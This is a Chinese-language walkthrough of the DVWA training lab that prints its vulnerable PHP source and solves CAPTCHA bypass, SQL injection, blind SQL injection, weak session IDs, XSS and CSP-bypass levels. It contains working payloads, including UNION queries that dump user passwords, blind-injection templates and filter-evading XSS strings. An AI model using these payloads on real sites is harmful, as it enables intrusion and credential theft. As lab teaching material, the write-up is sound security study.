<?php
if( isset( $_POST[ 'Change' ] ) ) {
    // Hide the CAPTCHA form
    $hide_form = true;
    // Get input
    $pass_new  = $_POST[ 'password_new' ];
    $pass_conf = $_POST[ 'password_conf' ];
    // Check CAPTCHA from 3rd party
    $resp = recaptcha_check_answer(
        $_DVWA[ 'recaptcha_private_key' ],
        $_POST['g-recaptcha-response']
    );
    if (
        $resp || 
        (
            $_POST[ 'g-recaptcha-response' ] == 'hidd3n_valu3'
            && $_SERVER[ 'HTTP_USER_AGENT' ] == 'reCAPTCHA'
        )
    ){
        // CAPTCHA was correct. Do both new passwords match?
        if ($pass_new == $pass_conf) {
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );
            // Update database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "' LIMIT 1;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
            // Feedback for user
            echo "<pre>Password Changed.</pre>";
        } else {
            // Ops. Password mismatch
            $html     .= "<pre>Both passwords must match.</pre>";
            $hide_form = false;
        }
    } else {
        // What happens when the CAPTCHA was entered incorrectly
        $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
        $hide_form = false;
        return;
    }
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
// Generate Anti-CSRF token
generateSessionToken();
?>

增加了身份验证,所以(通过身份验证条件)或者 (参数g-recaptcha-respon为hidd3n_valu3并且参数 HTTP_USER_AGE为 reCAPTC)就算是验证通过了

解决方法:

抓包修改即可

在这里插入图片描述

SQL注入

Low

源码解析:

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }

            mysqli_close($GLOBALS["___mysqli_ston"]);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            #$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB']);
            #$sqlite_db_connection->enableExceptions(true);

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    } 
}

?>

通过源码可以知道对参数id没有做任何检查、过滤,存在明显的SQL注入漏洞

解决方法:

SQL注入流程

拿到一个查询条件的web网页,就需要对输入框做以下的事情

1.判断是否存在注入,注入是字符型还是数字型

2.猜解SQL查询语句中的字段数

3.确定显示的字段顺序

4.获取当前数据库

5.获取数据库中的表

6.获取表中的字段名

7.下载数据

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

Medium

源码解析:

<?php
if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
//user中x00,n,r,,’,”,x1a转义,防SQL注入
    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];
        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>

用了下拉选择菜单,并且使用转义预防SQL注入

解决方法:

首先使用burp进行抓包
在这里插入图片描述

然后套公套公式

1.判断是否存在注入,注入是字符型还是数字型

输入1 and 1 = 1 – ,查询成功

2.猜解SQL查询语句中的字段数

输入1 or true order by 2 – ,查询成功,说明有第二列,也就是有俩字段

输入1 union select 1,2 – 成功

3.确定显示的字段顺序

输入1 union select 1,2 –

4.获取当前数据库

输入1 union select 1,database() –

1 union select version(),database()#

5.获取数据库中的表

1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

6.获取表中的字段名

1 union select 1, group_concat(column_name) from information_schema.columns where table_name=‘users’ –

7.下载数据

1 union select user,password from users#

查字段数: 1 order by 2

查数据库:1 union select 1,database()

查数据库中的表:1 union select 1,table_name from information_schema.tables where table_schema=’dvwa’

查users表中的字段: 1 union select column_name from information_schema.columns where table_name=’users’

爆出字段内容: 1 union select user,password from users

High

源码解析:

<?php
if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];
    // Check database
//【select * from tableName limit i,n 】
tableName : 为数据表;
i : 为查询结果的索引值(默认从0开始);
n : 为查询结果返回的数量
查询第一条数据
select * from student limit 1
查询第二条数据
select * from student limit 1,1
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];
        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
}
?>

使用了session 获取id值

解决方法:

使用单引号的闭合方式进行联合注入

1' union select group_concat(user),group_concat(password) from users #

SQL注入(盲注)

Low

源码解析:

 <?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];
    $exists = false;

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ); // Removed 'or die' to suppress mysql errors

            try {
                $exists = (mysqli_num_rows( $result ) > 0); // The '@' character suppresses errors
            } catch(Exception $e) {
                $exists = false;
            }
            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            try {
                $results = $sqlite_db_connection->query($query);
                $row = $results->fetchArray();
                $exists = $row !== false;
            } catch(Exception $e) {
                $exists = false;
            }

            break;
    }

    if ($exists) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    } else {
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

}

?>

同样对参数id没有做任何检查、过滤,存在明显的SQL注入漏洞,但SQL语句查询的返回结果只有两种

解决方法:

寻找注入点,常见为基于响应方式变化或基于时间变化判断注入点

与sql注入相比,盲注不会返回具体的语法错误,但方法与普通的sql注入相同

判断注入类型

Ⅰ.查询:1

得到结果[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fwDKBPQl-1645644879761)(C:\Users\Maple\AppData\Roaming\Typora\typora-user-images\image-20220210155539322.png)]

说明存在id=1

Ⅱ.查询:1 and 1=2

得到结果在这里插入图片描述

没有进行and逻辑判断,说明不存在数字型注入

Ⅲ.分别查询:1’ and 1=1 #和1’ and 1=2

得到结果发现存在字符型的注入,接下来就该猜解数据库名了

猜解数据库名

Ⅰ.查询:1’ and (length(database()))=数据库长度#

利用二分法思想从两端判断数据库名长度

Ⅱ.查询:1’ and ascii(substr(database(),库名第n位,1))=ASCII码值

通过查询ASCII码值从而获得完整的数据库名称

Ⅲ.查询:1’ and (select count(*) from information_schema.tables where table_schema=database())=该数据库下表的个数#

猜解表的个数

Ⅳ.查询:length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,第n个表),1))=表名长度

根据查询返回结果猜解表名称的长度值

Ⅴ.查询:1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,第n个字符))=ASCII码值

依次列出所有字符,获取表名

Ⅵ.同Ⅳ,Ⅴ将该数据库所有表名查出

Ⅶ.查询:(select count(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’)=XXX

查询users表单中的字段数量

判断[dvwa库-users表]中的字段数目

(select count(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’)=xxx

判断在[dvwa库-users表]中是否存在某个字段(调整column_name取值进行尝试匹配)

(select count(*) from information_schema.columns where table_schema=database() and table_name=‘users’ and column_name=‘xxx’)=1

猜解第i+1个字段的字符长度

length(substr((select column_name from information_shchema.columns limit i i i,1),1))=xxx

猜解第i+1个字段的字符组成,j代表组成字符的位置(从左至右第1/2/…号位)

ascii(substr((select column_name from information_schema.columns limit i i i,1), j j j,1))=xxx

Ⅷ.查询:1’ and (select count(*) from information_schema.columns where table_schema=database() and table_name=‘users’ and column_name=‘user’)=1

猜解users表中的各个字段的名称,第1个字段开始,对其猜解每一个组成字符,获取到完整的第1个字段名称…然后是第2/3/…/8个字段名称。首先获取几个包含关键信息的字段,例如用户密码之类的。

总的来说:盲注与普通的sql注入相比只是繁琐了很多,但是逻辑是是没有改变的,还是从注入类型,数据库长度、名称,表名长、表名,字段数、字段长、字段名称依次查询,最终获取数据库内敏感信息

Medium

源码解析:

<?php
if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $id = $_POST[ 'id' ];
//对特殊符号
\x00,\n,\r,\,’,”,\x1a进行转义
    $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); 
    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors
 
    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }
    //mysql_close();
}
?>

与普通的sql注入相似,用了下拉选择菜单,还利用mysql_real_escape_string函数对特殊符号\x00,\n,\r,’,”,\x1a进行转义

解决方法:

与原本的SQL注入相同,使用burp进行抓包即可

在这里插入图片描述

High

源码解析:

<?php
if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];
    // Check database
//limit限制查询只能为1条
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors
    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
//返回MISSING时,会随机执行sleep()函数,做执行,则延迟的时间是随机在2-4s
        // Might sleep a random amount
        if( rand( 0, 5 ) == 3 ) {
            sleep( rand( 2, 4 ) );
        }
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>

解决方法:

对于LIMIT 1的限制输出记录数目,可以利用#注释其限制;服务端可能会随机执行sleep()函数,做执行,则延迟的时间是随机在2-4s,这样会对正常的基于时间延迟的盲注测试造成干扰。因此可以考虑用基于布尔的盲注进行测试

弱会话ID(Weak Session IDs)

Session和Cookie

http协议是无状态的

就好像两个人用老式的手摇电话机通电话。每一次http请求和数据交换就像这样的一次电话通话过程,当请求完毕以后,再进行下一次请求时,http协议是无法追踪上一则通话记录的。这样每一次用户与服务器的交互都是独立的一次通话,对于一个web应用而言显然是存在问题的,因为用户的请求十有八九具有连续性。就比如一个用户在商城添加了某商品到购物车,当他去结账时,又是一次新的请求,他的购物车http协议仅仅通过连接状态是无法追踪的!

Session:来来来 给你分配个号码牌

为了解决用户的接续访问问题,一个简单的想法就是,将每一次用户与服务器之间的持续通话做为一个“会话”存放在服务器端。

当用户第一次打call进来的时候,你先别说话,先给你个小牌牌,这个小牌牌就用来做为这次用户会话的跟踪。

在我们的应用内通常使用sessionID或者类似的形式进行记录。

Cookie:请你证明你是你

在会话中我们有了标识自己身份的号码牌,由服务器生成颁发。用户拿到小牌牌,当然要妥善保管啦,将他存放到cookie里面就是现在的主流手段。当用户继续向服务器发出交互时,每一次接线员都先看一看这个小牌牌,证明你是你,然后再继续给你服务,不然别怪我翻脸不认人。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-57F8BC1h-1645644879762)(C:\Users\Maple\AppData\Roaming\Typora\typora-user-images\image-20220217160831959.png)]
————————————————
本文为CSDN博主「维梓梓」的原创文章
原文链接:https://blog.csdn.net/zy15667076526/article/details/109705286

Low

源码解析:

<?php

$html = "";

if ($_SERVER['REQUEST_METHOD'] == "POST") {
    if (!isset ($_SESSION['last_session_id'])) {
        $_SESSION['last_session_id'] = 0;
    }
    $_SESSION['last_session_id']++;
    $cookie_value = $_SESSION['last_session_id'];
    setcookie("dvwaSession", $cookie_value);
}
?>

解决方法:

抓包

在这里插入图片描述

退出登录,再登录,发现Session每次都在增加

在这里插入图片描述

我们猜到了sessionID的做一个是模拟cookie登录

在这里插入图片描述

在这里插入图片描述

没有输入用户名和密码就进来了

Medium

源码解析:

<?php
$html = "";
if ($_SERVER['REQUEST_METHOD'] == "POST") {
    $cookie_value = time();
    setcookie("dvwaSession", $cookie_value);
}

查看源码,与LOW级别相比,session变成了一个时间戳

解决方法:

还是先抓几个包
在这里插入图片描述

使用时间戳在线查询工具就可以伪造,我们可以在网上搜索一个时间戳的工具

在这里插入图片描述

然后方法与之前相同

在这里插入图片描述

High

源码解析:

<?php
$html = "";
if ($_SERVER['REQUEST_METHOD'] == "POST") {
    if (!isset ($_SESSION['last_session_id_high'])) {
        $_SESSION['last_session_id_high'] = 0;
    }
    $_SESSION['last_session_id_high']++;
    $cookie_value = md5($_SESSION['last_session_id_high']);
    setcookie("dvwaSession", $cookie_value, time()+3600, "/vulnerabilities/weak_id/", $_SERVER['HTTP_HOST'], false, false);
}
?>

name 规定cookie的名称。
value 规定cookie的值。
expire 规定cookie的有效期。
path 规定cookie的服务器路径。
domain 规定cookie的域名。
secure 规定是否通过安全的HTTPS连接来传输cookie。
httponly 规定是否Cookie仅可通过HTTP协议访问

解决方法:

抓包

在这里插入图片描述

重放

在这里插入图片描述

解密

在这里插入图片描述

其余方法与LOW级别相同

XSS:基于 DOM 的跨站点脚本 (DOM Based Cross Site Scripting)

漏洞描述文档对象模型(Document Object Model),即DOM。是用来在浏览器中表示文件的结构格式。DOM支持动态脚本,诸如JavaScript来引用文档组件,如表单字段或会话cookie。DOM也用于浏览器的安全,例如限制在不同域的脚本获取其它域的cookie会话。当活动内容(如JavaScript函数)被特制的请求修改时,可能会出现基于DOM的XSS漏洞,这样能够使得攻击者可以控制DOM元素。

Low

解决方法:

直接payload一个js函数即可

在这里插入图片描述

Medium

源码解析:

<?php
 
// Is there any input?
// array_key_exists()检查键是否存在
array_key_exists() 函数检查某个数组中是否存在指定的键名,如果键名存在则返回 true,如果键名不存在则返回 false。
提示:如果指定数组的时候省略了键名,将会生成从 0 开始并以 1 递增的整数键名
array_key_exists(key,array)
key 规定键名。
array 规定数组
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
//过滤<script,含script不可以
stripos() 函数查找字符串在另一字符串中第一次出现的位置(不区分大小写)
stripos(string,find,start)
string 规定被搜索的字符串。
find 规定要查找的字符。
start 规定开始搜索的位置。
返回值:返回字符串在另一字符串中第一次出现的位置,如果没有找到字符串则返回 FALSE。注释:字符串位置从 0 开始,不是从 1 开始。
    if (stripos ($default, "<script") !== false) {
//如果参数不含<script
header() 函数向客户端发送原始的 HTTP 报头
header(string,replace,http_response_code)
string 规定要发送的报头字符串。
replace 指示该报头是否替换之前的报头,或添加第二个报头。
默认是 true(替换)。false(允许相同类型的多个报头)。
http_response_code 把 HTTP 响应代码强制为指定的值。(PHP 4 以及更高版本可用)
 
        header ("location: ?default=English");
        exit;
    }
}
?>

解决方法:

直接在文本输入框添加

</option></select><img src=x onerror=alert(/flag/)>

onerror事件是专门针对js出错的,所以,标签闭合性被破坏刚好触发了这个事件,所以,他会被执行,执行之后将img标签的src属性替换成我们想要的属性,然而我注入的这个地址,故意又是一个不能访问的地址,于是,就反复的触发这个onerror事件,最终导致浏览器堆栈溢出了。如果图片存在,但网络很不通畅,也可能触发 onerror。

在这里插入图片描述

High

源码解析:

<?php
// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}
?>

设置了白名单,只对default进行检查

解决方法:

可以使用&连接另一个自定义变量来绕过

//构造:
English&<script>alert(/flag/)</script>

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sXR5UmsB-1645644879765)(C:\Users\Maple\AppData\Roaming\Typora\typora-user-images\image-20220224014341974.png)]

XSS:反射式跨站点脚本 (Reflected Cross Site Scripting)

反射型xss(跨站脚本攻击),通常人们会把跨站脚本攻击(Cross Site Scripting)缩写为CSS),但是这与浏览器的层叠样式表css会混淆,所以人们把跨站脚本攻击缩写为xss。

原理:

其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie信息、破坏页面结构、重定向到其它网站等。(简单一句话是html代码注入)而其本质就是:把用户的输入的数据当作代码执行。

XSS攻击需要具备两个条件:

  • 需要向web页面注入恶意代码;
  • 这些恶意代码能够被浏览器成功的执行

Low

源码解析:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

源码中对“name”没有过滤和检查

解决方法:

我们直接输入js函数进行注入
在这里插入图片描述
在这里插入图片描述

Medium

源码解析:

<?php
 
header ("X-XSS-Protection: 0");
 
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
//将输入中的<script>转化为空
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );
 
    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}
?>

查看源码,发现网站使用了str_replace()函数过滤了script

解决方法:

str_replace()有致命弊端,他区分大小写,我们可以使用大写绕过

<SCRIPT>alert(/flag/)</SCRIPT>

同样我们也可以不使用script,利用onerror事件绕过script

</option></select><img src=x onerror=alert(/flag/)>

在这里插入图片描述

High

源码解析:

<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}
?>

preg_replace() 函数执行一个正则表达式的搜索和替换,“*” 代表一个或多个任意字符,“i” 代表不区分大小写。也就是说 “< script >” 标签在这里被完全过滤了

解决方法:

我们可以通过其他的标签例如 img、body 等标签的事件或者iframe 等标签的 src 注入 JS 攻击脚本

<img src="#" onerror=alert(/flag/)>

在这里插入图片描述

XSS:存储的跨站点脚本(Stored Cross Site Scripting)

攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。这就意味着只要访问了这个页面的访客,都有可能会执行这段恶意脚本,因此储存型XSS的危害会更大。因为存储型XSS的代码存在于网页的代码中,可以说是永久型的。

存储型 XSS 一般出现在网站留言、评论、博客日志等交互处,恶意脚本存储到客户端或者服务端的数据库中。

Low

源码解析:

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitize name input
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

可以看到,对输入并没有做XSS方面的过滤与检查,且存储在数据库中,因此这里存在明显的存储型XSS漏洞。

解决方法:

message一栏执行一个js函数

在这里插入图片描述

在这里插入图片描述

此时这个语句已经存储在数据库中了,每次刷新后都会弹出框,直到数据库重置

Medium

源码解析:

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );
   //网页对message参数进行编码,无法通过message进行XSS注入

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}
?>

解决方法:

尽管对message参数进行了编码,但对于name参数仍然是简单过滤,我们希望通过大写或双写绕过,但发现name参数有长度限制

在这里插入图片描述

所以我们抓个包,绕后使用双写或大写绕过

在这里插入图片描述

在这里插入图片描述

High

源码解析:

<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );
    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );
    // Sanitize name input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    //mysql_close();
}
?>

发现又是这个preg_replace() 函数

解决方法:

方法还是使用标签,但是由于message参数被限制,name参数限制长度,所以需要抓包对name参数进行修改
在这里插入图片描述

在这里插入图片描述

CSP:内容安全策略绕过(Content Security Policy Bypass)

Low

源码解析:

<?php

$headerCSP = "Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com ;"; // allows js from self, pastebin.com, hastebin.com, jquery and google analytics.

header($headerCSP);

# These might work if you can't create your own for some reason
# https://pastebin.com/raw/R570EE00
# https://www.toptal.com/developers/hastebin/raw/cezaruzeka

?>
<?php
if (isset ($_POST['include'])) {
$page[ 'body' ] .= "
    <script src='" . $_POST['include'] . "'></script>
";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>You can include scripts from external sources, examine the Content Security Policy and enter a URL to include here:</p>
    <input size="50" type="text" name="include" value="" id="include" />
    <input type="submit" value="Include" />
</form>
';

从$headerCSP可以看出受信任的站点,只能允许这几个站点的脚本才可以运行。

pastebin.com 是一个快速分享文本内容的网站,就说明内容是可控的

在源代码中给了我们测试站点https://pastebin.com/raw/R570EE00

提交后查看源码

在这里插入图片描述

Medium

源码解析:

<?php

$headerCSP = "Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=';";

header($headerCSP);

// Disable XSS protections so that inline alert boxes will work
header ("X-XSS-Protection: 0");

# <script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(1)</script>

?>
<?php
if (isset ($_POST['include'])) {
$page[ 'body' ] .= "
    " . $_POST['include'] . "
";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p>
    <input size="50" type="text" name="include" value="" id="include" />
    <input type="submit" value="Include" />
</form>
';

解决方法:

首先尝试使用scrip方式,发现浏览器有报错

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

看起来像base64,进行解码后发现,他羞辱我

在这里插入图片描述

经过查阅发现报错信息含有nonce

在这里插入图片描述

头部指定了 nonce 值, 所以自动忽略了 ‘unsafe-inline’ 这个参数. 因此可以判断这两个参数是不能共存的, 而且如果共存, 后者是会覆盖前者的正确的防御方式下的 nonce 值不应该是个固定值, 而是应该是个随机生成的值, 这样才能真正达到防止 XSS 的目的

主要另nonce跟代码中的随机数保持一致即可

<script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(/flag/)</script>

High

源码解析:

PHP

<?php
$headerCSP = "Content-Security-Policy: script-src 'self';";
header($headerCSP);
?>
<?php
if (isset ($_POST['include'])) {
$page[ 'body' ] .= "
    " . $_POST['include'] . "
";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>The page makes a call to ' . DVWA_WEB_PAGE_TO_ROOT . '/vulnerabilities/csp/source/jsonp.php to load some code. Modify that page to run your own code.</p>
    <p>1+2+3+4+5=<span id="answer"></span></p>
    <input type="button" id="solve" value="Solve the sum" />
</form>
<script src="source/high.js"></script>
';

Javascript

function clickButton() {
    var s = document.createElement("script");
